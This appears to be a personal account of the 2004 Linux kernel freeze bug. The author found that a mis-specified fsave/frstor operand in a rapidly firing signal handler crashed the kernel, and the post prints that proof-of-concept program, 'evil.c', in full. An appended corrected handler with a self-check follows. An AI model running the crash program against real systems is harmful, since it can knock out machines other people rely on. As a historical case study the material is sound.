evil.c

The start

I once popped an idea into my head: I wanted to port Open Cubic Player to Linux. I worked on it for months without even having a running program, just bits and pieces that compiled. Just at the time when I started to get output onto my screen, I was about to port the last piece of code, the timers. As I added more and more of the code, my PC suddenly froze during one of the tests. I rebooted and tested again, and surely, it froze again. After several attempts at isolating the issue, I found the piece of code that made it happen. At first I thought the issue was caused by a gcc bug, and that it exploited a kernel bug. It later turned out that my code had a small bug in it, which gcc compiled happily, that exploited the kernel in a way not many people had thought about.

http://linuxreviews.org/features/2004-06-18_kernel_exploit_timeline/
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=15905
https://lore.kernel.org/all/1701.83.109.60.63.1086814977.squirrel@nepa.nlc.no/

#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

static void Handler(int ignore)
{
        char fpubuf[108];
        /* Save the x87 state on handler entry... */
        __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
        write(2, "*", 1);
        /* ...and restore it on exit. It should have been "m"(*fpubuf) in order to
         * reference the memory correctly; this small operand bug is what took the kernel down. */
        __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
        struct itimerval spec;
        signal(SIGALRM, Handler);
        /* Fire SIGALRM every 100 microseconds, starting 100 microseconds from now */
        spec.it_interval.tv_sec=0;
        spec.it_interval.tv_usec=100;
        spec.it_value.tv_sec=0;
        spec.it_value.tv_usec=100;
        setitimer(ITIMER_REAL, &spec, NULL);
        while(1)        /* keep the main loop busy while the timer keeps firing */
                write(1, ".", 1);

        return 0;
}
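For comparison, a corrected save/restore pair as an added example (my code, not the author's): fnsave gets an output ("=m") operand on a struct-typed buffer, so the operand names the buffer's memory rather than the array's address, and a self-check confirms that the round trip preserves the x87 control word. It assumes GCC or Clang on x86 (the inline asm is x87-specific); the names x87_state, save_fpu, restore_fpu, get_cw, set_cw and fpu_roundtrip_ok are mine.

```c
#include <stdint.h>
#include <unistd.h>

/* x87 image in fsave/frstor layout; a struct so "=m"/"m" name its memory. */
struct x87_state { unsigned char bytes[108]; } __attribute__((aligned(16)));
static void save_fpu(struct x87_state *s)
{
    /* fnsave WRITES the image, so it is an output ("=m") operand. */
    __asm__ __volatile__ ("fnsave %0" : "=m"(*s) : : "memory");
}
static void restore_fpu(const struct x87_state *s)
{
    __asm__ __volatile__ ("frstor %0" : : "m"(*s) : "memory");
}
static uint16_t get_cw(void)            /* read the x87 control word */
{
    uint16_t cw;
    __asm__ __volatile__ ("fnstcw %0" : "=m"(cw));
    return cw;
}
static void set_cw(uint16_t cw)         /* load the x87 control word */
{
    __asm__ __volatile__ ("fldcw %0" : : "m"(cw));
}

/* Corrected handler: the interrupted code's x87 state survives the handler. */
void Handler(int ignore)
{
    struct x87_state saved;
    (void)ignore;
    save_fpu(&saved);
    write(2, "*", 1);
    restore_fpu(&saved);
}

/* 1 when a save/restore round trip preserves the control word; 0x0F7F is the
 * fninit default 0x037F with rounding changed to toward-zero. */
int fpu_roundtrip_ok(void)
{
    struct x87_state img;
    uint16_t orig = get_cw();
    int ok;
    set_cw(0x0F7F);
    save_fpu(&img);                         /* fnsave also reinitialises the FPU */
    ok = get_cw() == 0x037F                 /* FCW is back at the fninit default */
      && img.bytes[0] == 0x7F && img.bytes[1] == 0x0F;  /* FCW sits at offset 0 */
    restore_fpu(&img);
    ok = ok && get_cw() == 0x0F7F;          /* and came back from the image */
    set_cw(orig);                           /* leave the caller's state as found */
    return ok;
}
```

Handler can be installed with setitimer exactly as in the original; fpu_roundtrip_ok() returns 1 on a working build.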